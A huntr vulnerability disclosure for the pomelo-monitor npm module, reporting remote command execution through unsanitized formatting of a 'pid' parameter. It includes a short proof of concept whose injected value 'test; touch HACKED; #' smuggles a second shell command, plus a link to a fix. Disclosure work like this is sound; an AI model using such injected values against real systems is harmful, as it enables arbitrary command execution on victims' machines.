huntr - RCE via insecure command formatting (Command Injection)

[huntr-helper]

This issue has been generated on-behalf of Mik317 (https://app.huntr.dev/users/Mik317)

Details

I would like to report a RCE issue in the pomelo-monitor module. It allows to execute arbitrary commands remotely inside the victim's PC

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/halfblood369/monitor/blob/master/lib/processMonitor.js#L26

Steps To Reproduce

// poc.js
var monitor = require('pomelo-monitor');
var param = {pid: 'test; touch HACKED; #', serverId: 'node-1'};
monitor.psmonitor.getPsInfo(param, function(err, data) {});

1. Check there aren't files called HACKED
2. Execute the following commands in another terminal:

npm i pomelo-monitor # Install affected module
node poc.js #  Run the PoC

3. Recheck the files: now HACKED has been created

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded :moneybag:? Go to https://huntr.dev/

[JamieSlome]

Please review https://github.com/halfblood369/monitor/pull/3 for a fix! 🍰